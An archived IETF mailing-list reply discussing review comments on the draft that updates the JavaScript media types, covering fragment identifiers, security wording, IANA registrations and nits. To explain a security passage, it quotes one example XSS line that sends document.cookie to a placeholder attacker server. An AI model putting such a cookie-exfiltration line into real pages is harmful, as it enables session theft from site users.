Re: [dispatch] Benjamin Kaduk's No Objection on draft-ietf-dispatch-javascript-mjs-13: (with COMMENT)
Mathias Bynens <mths@google.com> Fri, 07 January 2022 09:13 UTC
Return-Path: <mathiasb@google.com>
X-Original-To: dispatch@ietfa.amsl.com
Delivered-To: dispatch@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 385063A1790 for <dispatch@ietfa.amsl.com>; Fri, 7 Jan 2022 01:13:34 -0800 (PST)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -17.099
X-Spam-Level:
X-Spam-Status: No, score=-17.099 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, DKIMWL_WL_MED=-0.001, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, HTML_MESSAGE=0.001, SPF_HELO_NONE=0.001, SPF_PASS=-0.001, URIBL_BLOCKED=0.001, USER_IN_DEF_DKIM_WL=-7.5, USER_IN_DEF_SPF_WL=-7.5] autolearn=unavailable autolearn_force=no
Authentication-Results: ietfa.amsl.com (amavisd-new); dkim=pass (2048-bit key) header.d=google.com
Received: from mail.ietf.org ([4.31.198.44]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id Zfn5oRrFUUE5 for <dispatch@ietfa.amsl.com>; Fri, 7 Jan 2022 01:13:30 -0800 (PST)
Received: from mail-pl1-x62e.google.com (mail-pl1-x62e.google.com [IPv6:2607:f8b0:4864:20::62e]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id 0C4A43A1794 for <dispatch@ietf.org>; Fri, 7 Jan 2022 01:13:29 -0800 (PST)
Received: by mail-pl1-x62e.google.com with SMTP id s15so4417149plg.12 for <dispatch@ietf.org>; Fri, 07 Jan 2022 01:13:29 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=20210112; h=mime-version:references:in-reply-to:from:date:message-id:subject:to :cc; bh=5OGKyTSJrBa/3Nuqk1jHNHuyGtgs/Sj3JxmxUAgwGng=; b=X4cPSf1vvbQKSvkD2YJTgLi1ruQbyVkLsaBqahkkDpTvTJ9t1LQ7YZtEk05JxahFuQ 7jroqhu7AHh8Ek2UD6RCjqtjJrNOW2TRVwaOa0OiKXRzZaYl2Cb6SvSfXRTyCSy8wAbV 8X20lsB+o5lzlGtsvlwjZyI06cCk95ii92jLq5y37J0n1KNfXGYeJKBsArGEcMbf2DwZ 8qKGe8IEA9tCpNhOpWK4e1nP6ON0p4cmDKeXJtwZQFtrvGiihSR77/ltfxgosXY22/55 EkXFeJ9Gr8EhU1zS3kMUzeLo5oicNYxp0pNuUejD4CYcn2+F11Q0LNQgBCgOq59onDk7 gRpQ==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20210112; h=x-gm-message-state:mime-version:references:in-reply-to:from:date :message-id:subject:to:cc; bh=5OGKyTSJrBa/3Nuqk1jHNHuyGtgs/Sj3JxmxUAgwGng=; b=ssvEwSEpTwm8GdhLI4aqRZmpDEfQX2umeONpt334FdW8t6pa6Ysy4HZQZgbyh8QAcS ZHAZPca5VS4dqYWoWhFzlWLas+Dk2PQaa9bMyhxBkHygIu6yibi5GbnQCTnLyWtmDgcR kHELVSFZtNWc4t/cUcson6E+v+KyD6bVM9M7FsUZJ/hFzOplRdr1jdpHceyHaIXz6mF7 WCS9Oa1fq6gR4kDqpnMsCTKqsFNGvbfQLSTKL2VoaiR4CCEPKjCs3LmqPc8NDxO11fP5 JwPo2gBiHKCoBeDy/t/ZfL0/kDaaDbEtqNTT/u9gQDRtuxw/Id0+Vfe+loI04cM8WtQA MkMQ==
X-Gm-Message-State: AOAM532eh6hYOwqZ3E2W/zyxOY1D4szO+i87BGlRC8v+xYzTTH3yXbcZ hOHGfn+P1t0Putq8ihx33KQw3SdQ0C42+RLZmZnv7A==
X-Google-Smtp-Source: ABdhPJyXAXY6A8bApDLWQ4Rq2dOjrgBPiW+SVFH0/4qLUmC9nESBa8c6GCuFXmFWngk6Tr97ujK3m0NlJ8rhMIcgbLQ=
X-Received: by 2002:a17:902:d2d0:b0:149:48e4:f039 with SMTP id n16-20020a170902d2d000b0014948e4f039mr61820646plc.137.1641546807459; Fri, 07 Jan 2022 01:13:27 -0800 (PST)
MIME-Version: 1.0
References: <164142722748.6967.15810149469713452092@ietfa.amsl.com>
In-Reply-To: <164142722748.6967.15810149469713452092@ietfa.amsl.com>
From: Mathias Bynens <mths@google.com>
Date: Fri, 07 Jan 2022 10:13:15 +0100
Message-ID: <CADizRgZDhsVNky8iXyvbNqfSzB+7u5NoHxwaqCQF+cciO6CP9g@mail.gmail.com>
To: Benjamin Kaduk <kaduk@mit.edu>
Cc: The IESG <iesg@ietf.org>, draft-ietf-dispatch-javascript-mjs@ietf.org, dispatch chairs <dispatch-chairs@ietf.org>, DISPATCH WG <dispatch@ietf.org>, Ben Campbell <ben@nostrum.com>
Content-Type: multipart/alternative; boundary="00000000000057abc705d4fa6605"
Archived-At: <https://mailarchive.ietf.org/arch/msg/dispatch/9uU5J8QyOogyhzOB7bejG86gPsk>
Subject: Re: [dispatch] Benjamin Kaduk's No Objection on draft-ietf-dispatch-javascript-mjs-13: (with COMMENT)
X-BeenThere: dispatch@ietf.org
X-Mailman-Version: 2.1.29
Precedence: list
List-Id: DISPATCH Working Group Mail List <dispatch.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/dispatch>, <mailto:dispatch-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/dispatch/>
List-Post: <mailto:dispatch@ietf.org>
List-Help: <mailto:dispatch-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/dispatch>, <mailto:dispatch-request@ietf.org?subject=subscribe>
X-List-Received-Date: Fri, 07 Jan 2022 09:13:34 -0000
Thanks for the review! Replies inline. On Thu, Jan 6, 2022 at 1:00 AM Benjamin Kaduk via Datatracker < noreply@ietf.org> wrote: > Benjamin Kaduk has entered the following ballot position for > draft-ietf-dispatch-javascript-mjs-13: No Objection > > When responding, please keep the subject line intact and reply to all > email addresses included in the To and CC lines. (Feel free to cut this > introductory paragraph, however.) > > > Please refer to https://www.ietf.org/blog/handling-iesg-ballot-positions/ > for more information about how to handle DISCUSS and COMMENT positions. > > > The document, along with other ballot positions, can be found here: > https://datatracker.ietf.org/doc/draft-ietf-dispatch-javascript-mjs/ > > > > ---------------------------------------------------------------------- > COMMENT: > ---------------------------------------------------------------------- > > Section 3 > > This document does not define how fragment identifiers in resource > identifiers ([RFC3986], [RFC3987]) for documents labeled with one of > the media types defined in this document are resolved. An update of > this document may define processing of fragment identifiers. > > This section is the "modules" section; the disclaimer of specification of > fragment handling seems to apply to both script and module content, and > thus > to be misplaced in this section. > Thanks. Addressed in https://github.com/linuxwolf/bmeck-ids/pull/62/files. > Section 5 > > Module scripts in ECMAScript can request the fetching and processing > of additional scripts, called importing. Implementations that > support modules need to process imported sources in the same way as > scripts. Further, there may be additional privacy and security > concerns depending on the location(s) the original script and its > imported modules are obtained from. For instance, a script obtained > from "host-a.example" could request to import a script from "host- > b.example", which could expose information about the executing > environment (e.g., IP address) to "host-b.example". See the section > "ECMAScript Language: Scripts and Modules" in [ECMA-262] for details. > > Is the referenced "ECMAScript Language: Scripts and Modules" section > supposed to be providing more details on the importing process, or the > potential privacy and security concerns? I skimmed through it and found > nothing noteworthy on the latter, which suggests that perhaps the former > was > intended. If that's the case, then reordering the sentences within the > paragraph might be helpful. > Addressed in https://github.com/linuxwolf/bmeck-ids/pull/62/files. This circumstance can further be used to make information, that is > normally only available to the script, available to a web server by > encoding the information in the resource identifier of the resource, > which can further enable eavesdropping attacks. Implementation of > such facilities is subject to the security considerations of the host > environment, as discussed above. > > What does "the resource" refer to, here? I don't see a previous mention of > a resource that it would be referring to. Is it perhaps a resource that's > the target of a request to the web server that is receiving the information > in question? > It refers to for example, URLs, that can be constructed and requested using JavaScript/DOM APIs on the Web as part of an XSS attack <https://owasp.org/www-community/attacks/xss/>: 'https://hacker-controlled-server.example.com/log-cookie-data?cookie=' + document.cookie; This content is inherited as-is from RFC4329; we’d rather not make changes to it as it’s outside the scope of our proposed changes. Section 7.1 > > It's pretty surprising to see a normative dependency on RFC 4329 when we > claim to obsolete that document. > Note that the registrations intentionally refer to both the new doc and RFC 4329: Person & email address to contact for further information: See Author's Address section of [this document] and [RFC4329]. Happy to make changes if needed but given the above, the normative reference seems unsurprising to me. > Appendix B > > Looking at the diff from RFC 4329, I also see some text about handling > application/ecmascript content that has a "version" parameter to the media > type, that seems to have been removed entirely for this document. Is that > sufficiently noteworthy to be included in this change listing? > This falls under the list item “Updated various references where the original has been obsoleted.” which is already listed under the “Changes from RFC 4329” section. The "version" parameter refers to the following old RFC 4329 note: For the application/ecmascript media type, implementations MUST NOT process content labeled with a "version" parameter as if no such parameter had been specified; this is typically achieved by treating the content as unsupported. This does not match implementation reality, and Web browsers cannot implement this restriction without Breaking the Web: https://mathiasbynens.be/demo/javascript-mime-type The "version" parameter is just ignored in practice, like any other unspecified parameter, so there is no need to include any text about it. NITS > > Section 5 > > The programming language defined in [ECMA-262] is not intended to be > computationally self-sufficient, rather it is expected that the > computational environment provides facilities to programs to enable > specific functionality. [...] > > The comma usage seems off here. I'm not sure if the sentence overall > contains a comma splice or not, but probably there should be a comma after > "rather" regardless of whether the first comma is converted to > semicolon/full-stop or otherwise. > Good catch. Addressed in https://github.com/linuxwolf/bmeck-ids/pull/62/files. > Section 6 > > application/ecmascript" is to be removed. IANA is requested to add > the note "OBSOLETED in favor of text/javascript" to all registrations > except "text/javascript". > > Presumably this is "all registrations listed in this document", not "all > registrations in the registry"... > Indeed. That applies to the rest of the sentence as well, e.g. "All registrations will point to this document as reference.". > Section 6.2.x > > I extracted the various subsections and used diff to compare them. > Aside from the expected variation in type/subtype name and file extension > (.es vs .js), there is also variation in: > > - whether there is a full stop at the end of the "Change controller" line > Good catch! Fixed. > - some have the "Person & email address to contact for further information" > listing both this document and RFC 4329, but most just list this > document. > Fixed. > - text/livescript does not have a note about this registration applying to > later editions of [ECMA-262]; perhaps that's appropriate for the > livescript media type. > I’ve made this consistent for all registrations in the document. Your nits helped me find a few other inconsistencies that I’ve addressed as well. Thanks, Mathias
- [dispatch] Benjamin Kaduk's No Objection on draft… Benjamin Kaduk via Datatracker
- Re: [dispatch] Benjamin Kaduk's No Objection on d… Mathias Bynens
- Re: [dispatch] Benjamin Kaduk's No Objection on d… Benjamin Kaduk